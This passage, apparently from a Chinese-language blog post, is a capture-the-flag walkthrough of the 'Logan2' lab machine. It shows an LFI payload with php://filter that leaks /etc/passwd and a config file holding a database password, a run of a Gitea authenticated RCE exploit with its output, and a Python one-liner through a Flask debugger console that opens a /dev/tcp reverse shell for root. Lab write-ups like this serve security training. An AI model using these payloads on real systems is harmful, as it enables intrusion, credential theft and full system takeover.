piYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovcnVuL2lyY2Q6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjQyOjY1NTM0Ojovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4Kbm9ib2R5Ong6NjU1MzQ6NjU1MzQ6bm9ib2R5Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzeXN0ZW1kLW5ldHdvcms6eDo5OTg6OTk4OnN5c3RlbWQgTmV0d29yayBNYW5hZ2VtZW50Oi86L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwMDoxMDc6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgphdmFoaS1hdXRvaXBkOng6MTAxOjEwODpBdmFoaSBhdXRvaXAgZGFlbW9uLCwsOi92YXIvbGliL2F2YWhpLWF1dG9pcGQ6L3Vzci9zYmluL25vbG9naW4KbG9nYW46eDoxMDAwOjEwMDA6bG9nYW4sLCw6L2hvbWUvbG9nYW46L2Jpbi9iYXNoCnNzaGQ6eDoxMDI6NjU1MzQ6Oi9ydW4vc3NoZDovdXNyL3NiaW4vbm9sb2dpbgpteXNxbDp4OjEwMzoxMTI6TXlTUUwgU2VydmVyLCwsOi9ub25leGlzdGVudDovYmluL2ZhbHNlCmdpdDp4OjEwNDoxMTM6R2l0IFZlcnNpb24gQ29udHJvbCwsLDovaG9tZS9naXQ6L2Jpbi9iYXNoCmtldmluOng6MTAwMToxMDAxOmtldmluLCwsOi9ob21lL2tldmluOi9iaW4vYmFzaAo<\/code><\/pre>\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:108:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nlogan:x:1000:1000:logan,,,:\/home\/logan:\/bin\/bash\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\nmysql:x:103:112:MySQL Server,,,:\/nonexistent:\/bin\/false\ngit:x:104:113:Git Version Control,,,:\/home\/git:\/bin\/bash\nkevin:x:1001:1001:kevin,,,:\/home\/kevin:\/bin\/bash<\/code><\/pre>\n\u8bf4\u660e\u662f\u6709\u7528\u7684\uff0c\u5c1d\u8bd5php_filter<\/code>\u94fe\u7684\u5229\u7528\uff0c\u4f46\u662f\u6ca1\u80fd\u5f39\u56de\u53bb\u3002\u67e5\u770b\u662f\u5426\u5b58\u5728\u5176\u4ed6\u914d\u7f6e\u6587\u4ef6\uff1a<\/p>\nhttp:\/\/newsitelogan.logan.hmv\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/..\/var\/log\/apache2\/access.log&hack=php:\/\/filter\/convert.base64-encode\/resource=config.php<\/code><\/pre>\nPD9waHAKCQoJJHNlcnZlcm5hbWUgPSAibG9jYWxob3N0IjsKCSR1c2VybmFtZSA9ICJsb2dhbiI7CgkkcGFzc3dvcmQgPSAiU3VwZXJfbG9nYW4xMjM0IjsKCSRkYm5hbWUgPSAibG9nYW4iOwoKCS8vIENyZWF0ZSBjb25uZWN0aW9uCgkkY29ubiA9IG5ldyBteXNxbGkoJHNlcnZlcm5hbWUsICR1c2VybmFtZSwgJHBhc3N3b3JkLCAkZGJuYW1lKTsKCS8vIENoZWNrIGNvbm5lY3Rpb24KCWlmICgkY29ubi0+Y29ubmVjdF9lcnJvcikgewoJICBkaWUoIkNvbm5lY3Rpb24gZmFpbGVkOiAiIC4gJGNvbm4tPmNvbm5lY3RfZXJyb3IpOwoJfQoKPz4K<\/code><\/pre>\n<?php\n\n $servername = "localhost";\n $username = "logan";\n $password = "Super_logan1234";\n $dbname = "logan";\n\n \/\/ Create connection\n $conn = new mysqli($servername, $username, $password, $dbname);\n \/\/ Check connection\n if ($conn->connect_error) {\n die("Connection failed: " . $conn->connect_error);\n }\n\n?><\/code><\/pre>\n\u767b\u5f55<\/h3>\n
\u83b7\u5f97\u8d26\u53f7\u5bc6\u7801\uff1a<\/p>\n
logan\nSuper_logan1234<\/code><\/pre>\n\u5c1d\u8bd5\u767b\u5f55\u51763000<\/code>\u7aef\u53e3\uff0c\u770b\u770b\u53ef\u4ee5\u767b\u5f55\u3002\u987a\u4fbf\u6d4b\u4e00\u4e0bssh\uff0c\u53d1\u73b0\u53ef\u4ee5\u6b63\u5e38\u767b\u5f55\u5230\u7aef\u53e3\u670d\u52a1\u4e2d\uff1a<\/p>\n<\/div><\/p>\n\u770b\u770b\u6709\u6ca1\u6709\u5730\u65b9\u53ef\u4ee5\u53cd\u5f39\u4e00\u4e2ashell\u56de\u6765\uff1a<\/p>\n
<\/div><\/p>\n\u53d1\u73b0\u57288000<\/code>\u7aef\u53e3\u6258\u7ba1\u4e86\u4e00\u4e2a\u670d\u52a1\u3002<\/p>\n\u65b9\u6cd5\u4e00\uff1agit\u4efb\u52a1\u53cd\u5f39shell<\/h3>\n
<\/div><\/p>\n\u968f\u4fbf\u66f4\u65b0\u4e00\u4e0b\uff0c\u8fdb\u884c\u89e6\u53d1\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u65b9\u6cd5\u4e8c\uff1agitea\u7248\u672c\u6f0f\u6d1e<\/h3>\n
\u53ef\u4ee5\u6784\u9020\u62a5\u9519\u6216\u8005\u76f4\u63a5\u67e5\u627e\u76f8\u5173\u7248\u672c\uff1a<\/p>\n
<\/div><\/p>\n\u67e5\u627e\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ searchsploit gitea 1.12 \n-------------------------------------------------------------------------------------------------------------------------- \nExploit Title | Path\n--------------------------------------------------------------------------------------------------------------------------\nGitea 1.12.5 - Remote Code Execution (Authenticated) |multiple\/webapps\/49571.py\n-------------------------------------------------------------------------------------------------------------------------- \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ searchsploit -m multiple\/webapps\/49571.py\n Exploit: Gitea 1.12.5 - Remote Code Execution (Authenticated)\n URL: https:\/\/www.exploit-db.com\/exploits\/49571\n Path: \/usr\/share\/exploitdb\/exploits\/multiple\/webapps\/49571.py\n Codes: N\/A\n Verified: False\nFile Type: Python script, ASCII text executable\nCopied to: \/home\/kali\/temp\/Logan2\/49571.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ git config --global user.email "hack@whoami.com" \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ git config --global user.name "whoami" \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ python3 49571.py -t http:\/\/192.168.0.145:3000 -u logan -p Super_logan1234 -I 192.168.0.143 -P 1234\n _____ _ _______\n \/ ____(_)__ __| CVE-2020-14144\n | | __ _ | | ___ __ _\n | | |_ | | | |\/ _ \\\/ _` | Authenticated Remote Code Execution\n | |__| | | | | __\/ (_| |\n \\_____|_| |_|\\___|\\__,_| GiTea versions >= 1.1.0 to <= 1.12.5\n\n[+] Starting exploit ...\nhint: Using 'master' as the name for the initial branch. This default branch name\nhint: is subject to change. To configure the initial branch name to use in all\nhint: of your new repositories, which will suppress this warning, call:\nhint: \nhint: git config --global init.defaultBranch <name>\nhint: \nhint: Names commonly chosen instead of 'master' are 'main', 'trunk' and\nhint: 'development'. The just-created branch can be renamed via this command:\nhint: \nhint: git branch -m <name>\nInitialized empty Git repository in \/tmp\/tmp.xppUWOpuwp\/.git\/\n[master (root-commit) 3d511e9] Initial commit\n 1 file changed, 1 insertion(+)\n create mode 100644 README.md\nEnumerating objects: 3, done.\nCounting objects: 100% (3\/3), done.\nWriting objects: 100% (3\/3), 238 bytes | 238.00 KiB\/s, done.\n[+] Exploit completed !<\/code><\/pre>\n<\/div><\/p>\n\u540c\u6837\u53ef\u4ee5\u62ff\u5230\u7528\u6237\uff01<\/p>\n
\u63d0\u6743<\/h2>\n(remote) git@logan2:\/home\/git\/gitea-repositories\/logan\/future_web.git$ cd ~\n(remote) git@logan2:\/home\/git$ whoami;id\ngit\nuid=104(git) gid=113(git) groups=113(git)\n(remote) git@logan2:\/home\/git$ sudo -l\nMatching Defaults entries for git on logan2:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser git may run the following commands on logan2:\n (ALL) NOPASSWD: \/usr\/bin\/python3 \/opt\/app.py\n(remote) git@logan2:\/home\/git$ cd \/opt\nbash: cd: \/opt: Permission denied\n(remote) git@logan2:\/home\/git$ sudo \/usr\/bin\/python3 \/opt\/app.py\n * Serving Flask app 'app'\n * Debug mode: on\nWARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.\n * Running on all addresses (0.0.0.0)\n * Running on http:\/\/127.0.0.1:8000\n * Running on http:\/\/192.168.0.145:8000\nPress CTRL+C to quit\n * Restarting with stat\n * Debugger is active!\n * Debugger PIN: 100-395-477<\/code><\/pre>\n<\/div><\/p>\nDebugger+SSTI<\/h3>\n
\u7136\u540e\u6253\u5f00debugger<\/code>\u6267\u884c\u547d\u4ee4\uff1a<\/p>\nhttp:\/\/192.168.0.145:8000\/console<\/code><\/pre>\n\u6ca1\u6709\u8fc7\u6ee4\u5565\u7cfb\u7edf\u547d\u4ee4\uff0c\u5c1d\u8bd5\u5229\u7528\u4e00\u4e0b\uff1a<\/p>\n
__import__('os').popen('whoami').read();<\/code><\/pre>\n<\/div><\/p>\n\u53ef\u4ee5\u6b63\u5e38\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\uff0c\u5c1d\u8bd5\u53cd\u5f39shell\uff1a<\/p>\n
__import__('os').popen('bash -c "exec bash -i &>\/dev\/tcp\/192.168.0.143\/2345 <&1"').read();<\/code><\/pre>\n<\/div><\/p>\n\u5f97\u5230root\uff01\uff01\uff01\uff01<\/p>\n
<\/div><\/p>\n\u5176\u4ed6\u6536\u83b7<\/h2>\n
\u53d1\u73b0\u4e86\u4e00\u4e2a\u65b0\u5de5\u5177lfienum<\/code>\uff0c\u53ef\u4ee5\u5f88\u65b9\u4fbf\u7684\u6d4b\u8bd5lfi\u5305\u542b\u4e86\u54ea\u4e9b\u6587\u4ef6\uff0c\u800c\u4e0d\u5fc5\u624b\u52a8\u6d4b\u8bd5\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"Logan2 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 192.168.0.145 — -A Open 1 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-701","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/701","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=701"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/701\/revisions"}],"predecessor-version":[{"id":703,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/701\/revisions\/703"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=701"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=701"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=701"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"image-20240417200155353\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241777.png\")
<\/div>![\"image-20240417200213315\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241778.png\")
<\/div>![\"image-20240417200943219\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241779.png\")
<\/div><\/p>\n![\"image-20240417204805628\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241780.png\")
<\/div><\/p>\n![\"image-20240417205805289\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241781.png\")
<\/div>![\"image-20240417205941466\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241782.png\")
<\/div><\/p>\n![\"image-20240417210656146\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241784.png\")
<\/div><\/p>\n![\"image-20240628215205622\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241785.png\")
<\/div><\/p>\n![\"image-20240628220324749\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241786.png\")
<\/div><\/p>\n![\"image-20240628220812389\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241787.png\")
<\/div><\/p>\n![\"image-20240628221315598\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241788.png\")
<\/div><\/p>\n![\"image-20240628221415937\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241789.png\")
<\/div>![\"image-20240628221427819\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241790.png\")
<\/div><\/p>\n![\"image-20240628223414757\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241791.png\")
<\/div><\/p>\n![\"image-20240628224053707\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241792.png\")
<\/div><\/p>\n![\"image-20240628221911903\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241793.png\")
<\/div><\/p>\n![\"image-20240628222859864\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241794.png\")
<\/div><\/p>\n![\"image-20240628223112786\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241795.png\")
<\/div><\/p>\n![\"image-20240628223145133\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241796.png\")
<\/div><\/p>\n